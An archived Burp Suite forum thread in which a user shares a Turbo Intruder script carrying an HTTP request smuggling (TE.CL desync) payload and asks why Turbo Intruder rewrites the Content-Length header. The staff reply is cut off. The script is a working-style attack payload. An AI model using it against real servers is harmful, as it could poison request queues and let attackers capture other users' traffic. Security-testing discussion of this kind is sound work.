The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Turbo Intruder: always updating Content-Length header

Nan | Last updated: Mar 19, 2020 12:42AM UTC

Hello, I have been trying to launch a HTTP Desync attack using Turbo Intruder. Here is my script: def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=5, requestsPerConnection=1, timeout=10, pipeline=True, maxRetriesPerRequest=0, engine=Engine.THREADED, ) engine.start() attack = '''POST / HTTP/1.1 Host: example.com Content-Length: 4 Transfer-Encoding : chunked 46 POST /login HTTP/1.1 Host: example.com Content-Length: 15 kk 0 ''' engine.queue(attack) } ....... I am targeting an endpoint which I believe has the TE.CL vulnerability. For the above script (attack) to work, it's imperative that the 'Content-Length: 4' in the 'attack' request remains unchanged so that I can poison the vulnerable endpoint's receiving socket (with the request:'POST /login HTTP/1.1....'). However during my testing, I've noticed the 'Content-Length: 4' was always updated to 'Content-Length: 76' where 76 is the exact length of the message body of my 'attack' request, thus causing the failure of my Desync attack Any suggestions on how to avoid updating the 'Content-Length' header in this case? Did I not properly configure the Turbo Intruder?

Liam, PortSwigger Agent | Last updated: Mar 20, 2020 10:17AM UTC